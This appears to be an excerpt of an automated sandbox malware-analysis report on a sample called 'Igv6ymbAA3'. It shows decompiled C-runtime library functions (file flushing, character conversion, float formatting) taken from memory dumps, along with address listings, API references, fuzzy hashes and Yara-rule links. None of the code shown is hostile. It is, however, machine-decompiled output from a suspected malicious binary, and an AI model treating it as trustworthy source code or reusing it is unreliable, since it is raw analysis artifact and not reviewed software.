                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bba2
                                                                                                                                                                      0x0040bba2
                                                                                                                                                                      0x0040bba4
                                                                                                                                                                      0x0040bba6
                                                                                                                                                                      0x0040bba8
                                                                                                                                                                      0x0040bba8
                                                                                                                                                                      0x0040bbaa
                                                                                                                                                                      0x0040bbad
                                                                                                                                                                      0x0040bbaf
                                                                                                                                                                      0x0040bbb1
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bbb3
                                                                                                                                                                      0x0040bbb3
                                                                                                                                                                      0x0040bbb3
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bbb3
                                                                                                                                                                      0x0040bbb1
                                                                                                                                                                      0x0040bba0
                                                                                                                                                                      0x0040bb6e
                                                                                                                                                                      0x0040bb74
                                                                                                                                                                      0x0040bb76
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bb76
                                                                                                                                                                      0x0040bb35
                                                                                                                                                                      0x0040bb38
                                                                                                                                                                      0x0040bb3a
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bb3c
                                                                                                                                                                      0x0040bbf1
                                                                                                                                                                      0x0040bbf1
                                                                                                                                                                      0x0040bbf1
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bbf1
                                                                                                                                                                      0x0040bb42
                                                                                                                                                                      0x0040bb44
                                                                                                                                                                      0x0040bb46
                                                                                                                                                                      0x0040bb48
                                                                                                                                                                      0x0040bb48
                                                                                                                                                                      0x0040bb50
                                                                                                                                                                      0x0040bb55
                                                                                                                                                                      0x0040bb58
                                                                                                                                                                      0x0040bb5a
                                                                                                                                                                      0x0040bb5d
                                                                                                                                                                      0x0040bb5f
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bbe1
                                                                                                                                                                      0x0040bbe1
                                                                                                                                                                      0x0040bbe1
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040bb2a
                                                                                                                                                                      0x0040bb24
                                                                                                                                                                      0x0040bac8
                                                                                                                                                                      0x0040bac8
                                                                                                                                                                      0x0040bacd
                                                                                                                                                                      0x0040bace
                                                                                                                                                                      0x0040bacf
                                                                                                                                                                      0x0040bad0
                                                                                                                                                                      0x0040bad1
                                                                                                                                                                      0x0040bad2
                                                                                                                                                                      0x0040bad8
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040badd

                                                                                                                                                                      APIs
                                                                                                                                                                      • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                                                      • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                                                      • __locking.LIBCMT ref: 0040BB95
                                                                                                                                                                      • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3240763771-0
                                                                                                                                                                      • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                      • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                                                      • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                      • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02415F67 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _fseek_malloc_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 208892515-0
                                                                                                                                                                      • Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                                                                                                                                      • Instruction ID: 79a3bb7f8dcbe487a21571cf4f33aaf4a1e680a03c41f7055b336b36b836e9dc
                                                                                                                                                                      • Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                                                                                                                                      • Instruction Fuzzy Hash: 96419472704B114AD730CA2EA9047577BEAAFC0368F164A1FE9A6867D0E731E485CF51
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0241BD11 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1291973410-0
                                                                                                                                                                      • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                      • Instruction ID: 4c2126f90021a74579f25840e5eaa97dbb59be6376a6c88f8e67a040a139fee7
                                                                                                                                                                      • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                      • Instruction Fuzzy Hash: AC41C631A00708EFDB299F6AC8845AFB7B6EF8072CF24856FD45597640E770D951CB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E0040EC86( &_v20, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E0040BFC1(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                                                                                                                                      0x004152a9
                                                                                                                                                                      0x004152b0
                                                                                                                                                                      0x004152c7
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004152b7
                                                                                                                                                                      0x004152b9
                                                                                                                                                                      0x004152d3
                                                                                                                                                                      0x004152d8
                                                                                                                                                                      0x004152db
                                                                                                                                                                      0x004152de
                                                                                                                                                                      0x00415307
                                                                                                                                                                      0x0041530e
                                                                                                                                                                      0x00415310
                                                                                                                                                                      0x00415391
                                                                                                                                                                      0x004153ac
                                                                                                                                                                      0x004153ae
                                                                                                                                                                      0x004152ee
                                                                                                                                                                      0x004152ee
                                                                                                                                                                      0x004152f1
                                                                                                                                                                      0x004152f3
                                                                                                                                                                      0x004152f6
                                                                                                                                                                      0x004152f6
                                                                                                                                                                      0x004152f6
                                                                                                                                                                      0x004152f6
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004152fc
                                                                                                                                                                      0x00415370
                                                                                                                                                                      0x00415370
                                                                                                                                                                      0x00415375
                                                                                                                                                                      0x0041537b
                                                                                                                                                                      0x0041537e
                                                                                                                                                                      0x00415380
                                                                                                                                                                      0x00415383
                                                                                                                                                                      0x00415383
                                                                                                                                                                      0x00415383
                                                                                                                                                                      0x00415383
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00415387
                                                                                                                                                                      0x00415312
                                                                                                                                                                      0x00415315
                                                                                                                                                                      0x0041531b
                                                                                                                                                                      0x0041531e
                                                                                                                                                                      0x00415345
                                                                                                                                                                      0x00415348
                                                                                                                                                                      0x0041534e
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00415350
                                                                                                                                                                      0x00415353
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00415355
                                                                                                                                                                      0x00415355
                                                                                                                                                                      0x0041535b
                                                                                                                                                                      0x0041535e
                                                                                                                                                                      0x004152cc
                                                                                                                                                                      0x004152cc
                                                                                                                                                                      0x00415367
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00415367
                                                                                                                                                                      0x00415320
                                                                                                                                                                      0x00415323
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00415327
                                                                                                                                                                      0x00415338
                                                                                                                                                                      0x0041533e
                                                                                                                                                                      0x00415340
                                                                                                                                                                      0x00415343
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00415343
                                                                                                                                                                      0x004152e0
                                                                                                                                                                      0x004152e3
                                                                                                                                                                      0x004152e5
                                                                                                                                                                      0x004152eb
                                                                                                                                                                      0x004152eb
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004152bb
                                                                                                                                                                      0x004152bb
                                                                                                                                                                      0x004152c0
                                                                                                                                                                      0x004152c4
                                                                                                                                                                      0x004152c4
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004152c0
                                                                                                                                                                      0x004152b9

                                                                                                                                                                      APIs
                                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                                                      • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                      • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                                                      • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                      • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02425506 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0242553A
                                                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 0242556E
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 0242559F
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 0242560D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                                                      • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                      • Instruction ID: 8610f56c80eeeb4909b190e158bd8f75b582f1b9688fe5e01cc0c7da392969bb
                                                                                                                                                                      • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                      • Instruction Fuzzy Hash: 1F31D331A10265EFCB28DF65C880ABF7BBAEF01314FD4456AE4658B294E730D9C4CB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}






                                                                                                                                                                      0x004134e0
                                                                                                                                                                      0x004134e6
                                                                                                                                                                      0x00413559
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004134ed
                                                                                                                                                                      0x004134ed
                                                                                                                                                                      0x004134f0
                                                                                                                                                                      0x0041350b
                                                                                                                                                                      0x0041350e
                                                                                                                                                                      0x0041352e
                                                                                                                                                                      0x00413540
                                                                                                                                                                      0x00413510
                                                                                                                                                                      0x00413510
                                                                                                                                                                      0x00413513
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00413515
                                                                                                                                                                      0x00413527
                                                                                                                                                                      0x00413527
                                                                                                                                                                      0x00413513
                                                                                                                                                                      0x0041355e
                                                                                                                                                                      0x00413562
                                                                                                                                                                      0x004134f2
                                                                                                                                                                      0x0041350a
                                                                                                                                                                      0x0041350a
                                                                                                                                                                      0x004134f0

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                      • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                      • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02423742 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                      • Instruction ID: 6379a2ec7e88db2ba748c81ea8cebc4b9d55f9b7aa5de10b858e9b88c78d5912
                                                                                                                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                      • Instruction Fuzzy Hash: 7F117E7200016ABBCF125E86CC458EE3F77BF48754F888496FA1858130D33AC5B5AB81
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%